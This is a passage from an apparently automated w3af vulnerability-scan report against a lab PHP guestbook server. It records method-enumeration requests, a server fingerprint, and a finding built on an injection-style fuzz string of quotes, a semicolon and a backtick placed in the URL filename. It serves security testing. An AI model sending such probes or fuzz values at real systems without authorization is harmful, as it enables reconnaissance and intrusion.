                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                </httpresponse>
            </http-transaction>
            <http-transaction id="194">
                <httprequest>
                    <status>REPORT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="230">
                <httprequest>
                    <status>NOTIFY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="237">
                <httprequest>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="287">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="392">
                <httprequest>
                    <status>CHECKOUT http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="431">
                <httprequest>
                    <status>PROPFIND http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="465">
                <httprequest>
                    <status>SUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="485">
                <httprequest>
                    <status>LOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="502">
                <httprequest>
                    <status>MKDIR http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="593">
                <httprequest>
                    <status>MERGE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="617">
                <httprequest>
                    <status>UNLOCK http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="643">
                <httprequest>
                    <status>PROPPATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="698">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="0" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="720">
                <httprequest>
                    <status>COPY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="744">
                <httprequest>
                    <status>TRACE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="792">
                <httprequest>
                    <status>PATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="847">
                <httprequest>
                    <status>UNSUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="867">
                <httprequest>
                    <status>MKACTIVITY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[1]" method="GET" name="Webserver fingerprint" plugin="hmap" severity="Information" url="None" var="None">
        <description>The most accurate fingerprint for this HTTP server is: &quot;JigSaw 2.2.2 (Solaris 8)&quot;.</description>
        <http-transactions>
            <http-transaction id="1">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[253, 295, 316]" method="GET" name="Unidentified vulnerability" plugin="generic" severity="Medium" url="http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29" var="token">
        <description>An unidentified vulnerability was found at: &quot;http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;d'kc&quot;z'gj'&quot;**5*(((;-*`)&quot;.</description>
        <http-transactions>
            <http-transaction id="253">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="295">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/4nV4dSKX HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="316">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
